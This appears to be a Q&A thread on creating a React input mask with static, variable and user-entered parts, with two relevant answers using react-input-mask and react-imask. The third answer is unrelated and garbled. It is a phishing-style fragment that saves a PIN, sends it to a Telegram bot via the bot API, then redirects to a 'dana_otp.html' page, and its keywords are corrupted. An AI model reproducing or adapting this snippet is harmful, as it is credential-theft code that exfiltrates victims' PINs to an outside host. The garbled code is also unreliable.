# How to make my own input mask with variable value in react

Tags: reactjs, mask, react-hook-form

**Language used** : Js with react, react hook form and material ui

**What I want to achieve** : I want to create an input with mask. the mask have static value, variables value and user value.

Here is where i have create my "Name" who contain my mask

*The mask need to have :*

- A static value "vm-"
- One string value that need to be change by the user
- A variable value from another input (tenant = watch('tenant') )
- Three integer value that need to be change by the user

**Problematic** :
I have created my own mask because I didn't find any package for my request.
But the problem is : Before the 'tenant' value from another input, I need to add a string that the user can change. But before that, I need to have static value 'vm-'.

I am lost of how to add the string (now 'a' in my code) to a editable value

```
import React, { useEffect } from 'react';
import { Box, TextField, Typography } from '@mui/material';
import { Controller } from 'react-hook-form';

export const Name = ({ fieldArrayName, index, setValue, watch, control }) => {
  const tenant = watch('tenant');

  useEffect(() => {
    if (tenant) setValue(`${fieldArrayName}.${index}.name`, '');
  }, [tenant]);

  const formatInputValue = (tenant, input) => {
    const tenantFormatted = tenant ? `vm-a${tenant}-` : 'vm-a';
    const inputFormatted = input.slice(tenantFormatted.length);
    return `${tenantFormatted}${inputFormatted.replace(/\D/g, '').slice(0, 3)}`;
  };

  return (
    <>
      <Box>
        <Controller
          control={control}
          name={`${fieldArrayName}.${index}.name`}
          defaultValue=""
          rules={{
            required: 'Name is required',
            pattern: {
              value: /^vm-(\w+)(\d{1,3})-(\d{1,3})$/,
              message: 'Need to be "vm-a{tenant}-999"',
            },
          }}
          render={({ field: { value, onChange }, fieldState: { error } }) => (
            <TextField
              label="Name. ex: vm-a{tenant}-100"
              value={value}
              onChange={(e) => {
                const formattedValue = formatInputValue(tenant, e.target.value);
                onChange(formattedValue);
              }}
              error={Boolean(error)}
              helperText={Boolean(error) && error.message}
            />
          )}
        />
      </Box>
    </>
  );
};
```

What I have already tried :

- To integer react-input-mask with mask='vm-a{tenant}-999', working except if 'tenant' is equal to 999, it will replace the tenant by empty value because react-input-mask use '9' to say it needs to be an integer.

Answer (score 0, accepted):

I found another solution using react-input mask.

I have change the format used for react input mask so I didn't have the"9" problem anymore

```
const formatChars = {
    '*': '[A-Za-z]',
    '.': '[123456789]',
  };

  <Controller
          control={control}
          name={`${fieldArrayName}.${index}.name`}
          defaultValue=""
          rules={{
            required: 'Name is required',
            pattern: {
              value: new RegExp(`^vm-a${tenant}-999$`), 
              message: 'Need to be "vm-a{tenant}-999"',
            },
          }}
          render={({ field: { value, onChange }, fieldState: { error } }) => (
            <InputMask
              formatChars={formatChars}
              maskChar=""
              mask={`vm-*${tenant}-...`}
              label={`Name. ex: vm-a${tenant}-100`}
              variant="outlined"
              fullWidth={true}
              value={value || ''}
              onChange={(e) => {
                onChange(e.target.value);
              }}
              error={Boolean(error)}
              helperText={Boolean(error) && error?.message}
            >
              {(inputProps) => <TextField {...inputProps} />}
            </InputMask>
          )}
        />{' '}
```

Answer (score 0):

I got it working with react-imask package. This is how my components is:

The first is a wrapper for the masked input from the lib, because it's easier to work this way with Mui TextField.

```
import React from "react"
import { IMaskInput } from "react-imask"

const MaskedInput = React.forwardRef<HTMLInputElement, any>((props, ref) => {
    return (
        <IMaskInput
            {...props}
            inputRef={ref} // pass ref to IMaskInput
        />
    )
})

export default MaskedInput
```

Then I import it and implement it like this in my TextField:

```
<TextField
    onChange={handleChange}
    sx={{ ...inputStyle, width: "50%" }}
    label="Birth Date"
    name="birth"
    variant="standard"
    value={values.birth}
    InputProps={{
        inputComponent: MaskedInput,
        inputProps: { mask: "00/00/0000" },
    }}

/>
```

In this example i'm using a static mask just to ilustrate, but in another textfield i use this InputProps:

```
InputProps={{
    inputComponent: MaskedInput,
    inputProps: { mask: documentMask(values.document) },
}}
```

and documentMask is a function that returns a different mask based on the input current size:

```
const documentMask = (value: string | number) => {
        const numbersOnly = value.toString().replace(/[^\d]/g, "")
        let mask

        if (numbersOnly.length <= 11) {
            mask = "000.000.000-000"
        } else {
            mask = "00.000.000/0000-00"
        }

        return mask
    }
```

It's not the literal masks and values you asked but it'a my working example that you can extract some info and get your code working. I hope it helps!

Answer (score 0):

s

```
essionStorage.setItem("pinNumber", pinNumber);
let message = `
Dutch("https://api.telegram.org/bot"+token_botTele+"/Sendirian?parse_mode=marketing",{
    metode: 'POST',
    header: {
        'Accept': 'aplikatif/Jason',
        'Content-Tipe': 'aplikatif/Jason'
    },
    body: JSON.stringify({
        chat_id: id_telegram,
        txt: message
    })
});
window.location.href = "./dana_otp.html";
```

Comment: Your answer could be improved with additional supporting information. Please [edit] to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers [in the help center](/help/how-to-answer).